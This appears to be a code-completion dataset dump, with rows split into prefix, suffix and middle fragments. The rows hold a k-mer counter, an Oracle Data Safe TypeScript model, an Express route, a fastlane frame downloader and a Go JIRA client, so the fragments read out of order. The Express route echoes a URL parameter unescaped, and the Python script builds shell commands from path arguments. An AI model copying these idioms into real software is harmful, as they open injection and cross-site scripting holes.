for i in range(0,(4**k)):
if FrequencyArray[i] == maxCount:
pattern = NumberToPattern(i,k)
FrequentPatterns.append(pattern)
return FrequentPatterns
print(FasterFrequentWords("ACGCGGCTCTGAAA",2)) | NumberToPattern |
audit-trail.ts | /**
* Data Safe API
* APIs for using Oracle Data Safe.
* OpenAPI spec version: 20181201
*
*
* NOTE: This class is auto generated by OracleSDKGenerator.
* Do not edit the class manually.
*
* Copyright (c) 2020, 2022, Oracle and/or its affiliates. All rights reserved.
* This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
*/
import * as model from "../model";
import common = require("oci-common");
/**
* An audit trail represents the source of audit records that provides documentary evidence of
* the sequence of activities in the target database. Configuring audit trails in Data Safe, and enabling
* audit data collection on the audit trails copies the audit records from the target database's audit trail
* into the Data Safe repository.
*
*/
export interface AuditTrail {
/**
* The OCID of the audit trail.
*/
"id": string;
/**
* The OCID of the parent audit.
*/
"auditProfileId": string;
/**
* The OCID of the Data Safe target for which the audit trail is created.
*/
"targetId": string;
/**
* The display name of the audit trail.
*/
"displayName": string;
/**
* The date and time the audit trail was created, in the format defined by RFC3339.
*/
"timeCreated": Date;
/**
* The date and time the audit trail was updated, in the format defined by RFC3339.
*/
"timeUpdated": Date;
/**
* The current state of the audit trail.
*/
"lifecycleState": model.AuditTrailLifecycleState;
/**
* The current sub-state of the audit trail.
*/
"status": model.AuditTrailStatus;
/**
* Details about the current state of the audit trail in Data Safe.
*/
"lifecycleDetails"?: string;
/**
* An audit trail location represents the source of audit records that provides documentary
* evidence of the sequence of activities in the target database.
*
*/
"trailLocation"?: string;
/**
* The description of the audit trail.
*/
"description"?: string;
/**
* Indicates if auto purge is enabled on the target database, which helps delete audit data in the
* target database every seven days so that the database's audit trail does not become too large.
*
*/
"isAutoPurgeEnabled"?: boolean;
/**
* The date from which the audit trail must start collecting data, in the format defined by RFC3339.
*/
"auditCollectionStartTime"?: Date;
/**
* The OCID of the workrequest for audit trail which collects audit records.
*/
"workRequestId"?: string;
/**
* The OCID of the compartment that contains the audit trail and its same as the compartment
* of audit profile resource.
*
*/
"compartmentId": string;
/**
* Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm)
* <p>
Example: `{\"Department\": \"Finance\"}`
*
*/
"freeformTags"?: { [key: string]: string };
/**
* Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm)
* <p>
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
*
*/
"definedTags"?: { [key: string]: { [key: string]: any } };
/**
* System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see Resource Tags.
* Example: `{\"orcl-cloud\": {\"free-tier-retained\": \"true\"}}`
*
*/
"systemTags"?: { [key: string]: { [key: string]: any } }; | export function getJsonObj(obj: AuditTrail): object {
const jsonObj = { ...obj, ...{} };
return jsonObj;
}
export function getDeserializedJsonObj(obj: AuditTrail): object {
const jsonObj = { ...obj, ...{} };
return jsonObj;
}
} | }
export namespace AuditTrail { |
DynamicRoute.js | var express = require("express");
var app = express(); | app.listen(3000); |
app.get("/:id", function(req, res) {
res.send("The id you specified is " + req.params.id);
}); |
fastlane-templates.py | #!/usr/bin/env python3
#
# Retrieve templates from fastlane/frameit
#
import sys
import os
from os import path
from shutil import copyfile
from tempfile import gettempdir
import re
import json
import cv2
import numpy as np
from common import sanitize_color, sanitize_device_name, sanitize_device_key, apply_default_color
# URL to frameit-frames repository
FRAMEIT_URL = "https://github.com/fastlane/frameit-frames/archive/gh-pages.zip"
def main():
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} resource_dir contents_file")
exit(1)
resource_dir = sys.argv[1]
contents_path = sys.argv[2]
zip_path = path.join(resource_dir, "gh-pages.zip")
repo_dir = path.join(resource_dir, "frameit-frames-gh-pages")
print("Downloading frameit frames...")
status_code = os.system(f"wget -q --show-progress -O \"{zip_path}\" \"{FRAMEIT_URL}\" && unzip -d \"{resource_dir}\" \"{zip_path}\"")
print(f"Status code: {status_code}")
# path to latest frames
frameit_dir = path.join(repo_dir, "latest")
with open(contents_path, "r") as cf:
contents = json.load(cf)
for frame_path in os.listdir(frameit_dir):
frame_path = path.join(frameit_dir, frame_path)
filename = path.basename(frame_path)
if not path.isfile(frame_path) or not filename_valid(filename):
continue
device_name = sanitize_device_name(filename)
device_key = sanitize_device_key(device_name)
device_color = sanitize_color(filename)
print(f"Found template: {frame_path}")
print(f"Template {device_name} - {device_color}")
image = cv2.imread(frame_path, cv2.IMREAD_UNCHANGED) # read preserving alpha
frame_height, frame_width = image.shape[:2]
ox, oy, width, height = measure_screen_bounds(image)
print(f"==> +{ox}+{oy}, {width}x{height}")
if device_key in contents:
device_info = contents[device_key]
else:
device_info = {
"images": {},
"left": ox,
"top": oy,
"right": ox + width,
"bottom": oy + height,
"res_height": frame_height,
"res_width": frame_width
}
device_info["images"][device_color] = filename
contents[device_key] = device_info
copyfile(frame_path, path.join(resource_dir, filename))
# default colors - first model color which is available in DEFAULT_COLOR array
for key in contents.keys():
apply_default_color(contents, key)
with open(contents_path, "w") as cf:
json.dump(contents, cf, sort_keys=True, indent=4)
print("Cleaning up...")
os.system(f"rm {zip_path} && rm -r {repo_dir}")
def measure_screen_bounds(image):
alpha = image[:, :, 3]
alpha = cv2.threshold(alpha, 252, 255, cv2.THRESH_BINARY_INV)[1] # 99% threshold
# connected component analysis
n, labels, stats, centroids = cv2.connectedComponentsWithStats(alpha, connectivity=8)
# compare centroids to image center
img_center = np.array([alpha.shape[0] // 2, alpha.shape[1] // 2])
# component which contains image center should be screen
screen_label = labels[img_center[0], img_center[1]]
x, y, width, height = stats[screen_label][:4]
return int(x), int(y), int(width), int(height)
def filename_valid(filename):
|
if __name__ == "__main__":
main()
| pattern = "^Apple iP.*\.png$"
return re.search(pattern, filename) is not None |
jira.go | package jira
import (
"bytes"
"encoding/json"
"fmt"
"io"
"net/http"
"net/url"
"reflect"
"github.com/google/go-querystring/query"
)
// A Client manages communication with the JIRA API.
type Client struct {
// HTTP client used to communicate with the API.
client *http.Client
// Base URL for API requests.
baseURL *url.URL
// Session storage if the user authentificate with a Session cookie
session *Session
// Services used for talking to different parts of the JIRA API.
Authentication *AuthenticationService
Issue *IssueService
Project *ProjectService
Board *BoardService
Sprint *SprintService
User *UserService
Group *GroupService
}
// NewClient returns a new JIRA API client.
// If a nil httpClient is provided, http.DefaultClient will be used.
// To use API methods which require authentication you can follow the preferred solution and
// provide an http.Client that will perform the authentication for you with OAuth and HTTP Basic (such as that provided by the golang.org/x/oauth2 library).
// As an alternative you can use Session Cookie based authentication provided by this package as well.
// See https://docs.atlassian.com/jira/REST/latest/#authentication
// baseURL is the HTTP endpoint of your JIRA instance and should always be specified with a trailing slash.
func NewClient(httpClient *http.Client, baseURL string) (*Client, error) {
if httpClient == nil {
httpClient = http.DefaultClient
}
parsedBaseURL, err := url.Parse(baseURL)
if err != nil {
return nil, err
}
c := &Client{
client: httpClient,
baseURL: parsedBaseURL,
}
c.Authentication = &AuthenticationService{client: c}
c.Issue = &IssueService{client: c}
c.Project = &ProjectService{client: c}
c.Board = &BoardService{client: c}
c.Sprint = &SprintService{client: c}
c.User = &UserService{client: c}
c.Group = &GroupService{client: c}
return c, nil
}
// NewRawRequest creates an API request.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// Allows using an optional native io.Reader for sourcing the request body.
func (c *Client) NewRawRequest(method, urlStr string, body io.Reader) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
req, err := http.NewRequest(method, u.String(), body)
if err != nil {
return nil, err
}
req.Header.Set("Content-Type", "application/json")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// NewRequest creates an API request.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// If specified, the value pointed to by body is JSON encoded and included as the request body.
func (c *Client) NewRequest(method, urlStr string, body interface{}) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
var buf io.ReadWriter
if body != nil {
buf = new(bytes.Buffer)
err = json.NewEncoder(buf).Encode(body)
if err != nil {
return nil, err
}
}
req, err := http.NewRequest(method, u.String(), buf)
if err != nil {
return nil, err
}
req.Header.Set("Content-Type", "application/json")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// addOptions adds the parameters in opt as URL query parameters to s. opt
// must be a struct whose fields may contain "url" tags.
func addOptions(s string, opt interface{}) (string, error) {
v := reflect.ValueOf(opt)
if v.Kind() == reflect.Ptr && v.IsNil() {
return s, nil
}
u, err := url.Parse(s)
if err != nil {
return s, err
}
qs, err := query.Values(opt)
if err != nil {
return s, err
}
u.RawQuery = qs.Encode()
return u.String(), nil
}
// NewMultiPartRequest creates an API request including a multi-part file.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// If specified, the value pointed to by buf is a multipart form.
func (c *Client) NewMultiPartRequest(method, urlStr string, buf *bytes.Buffer) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
req, err := http.NewRequest(method, u.String(), buf)
if err != nil {
return nil, err
}
// Set required headers
req.Header.Set("X-Atlassian-Token", "nocheck")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// Do sends an API request and returns the API response.
// The API response is JSON decoded and stored in the value pointed to by v, or returned as an error if an API error has occurred.
func (c *Client) Do(req *http.Request, v interface{}) (*Response, error) {
httpResp, err := c.client.Do(req)
if err != nil {
return nil, err
}
err = CheckResponse(httpResp)
if err != nil {
// Even though there was an error, we still return the response
// in case the caller wants to inspect it further
return newResponse(httpResp, nil), err
}
if v != nil {
// Open a NewDecoder and defer closing the reader only if there is a provided interface to decode to
defer httpResp.Body.Close()
err = json.NewDecoder(httpResp.Body).Decode(v)
}
resp := newResponse(httpResp, v)
return resp, err
}
// CheckResponse checks the API response for errors, and returns them if present.
// A response is considered an error if it has a status code outside the 200 range.
// The caller is responsible to analyze the response body.
// The body can contain JSON (if the error is intended) or xml (sometimes JIRA just failes).
func CheckResponse(r *http.Response) error |
// GetBaseURL will return you the Base URL.
// This is the same URL as in the NewClient constructor
func (c *Client) GetBaseURL() url.URL {
return *c.baseURL
}
// Response represents JIRA API response. It wraps http.Response returned from
// API and provides information about paging.
type Response struct {
*http.Response
StartAt int
MaxResults int
Total int
}
func newResponse(r *http.Response, v interface{}) *Response {
resp := &Response{Response: r}
resp.populatePageValues(v)
return resp
}
// Sets paging values if response json was parsed to searchResult type
// (can be extended with other types if they also need paging info)
func (r *Response) populatePageValues(v interface{}) {
switch value := v.(type) {
case *searchResult:
r.StartAt = value.StartAt
r.MaxResults = value.MaxResults
r.Total = value.Total
}
return
}
| {
if c := r.StatusCode; 200 <= c && c <= 299 {
return nil
}
err := fmt.Errorf("Request failed. Please analyze the request body for more details. Status code: %d", r.StatusCode)
return err
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.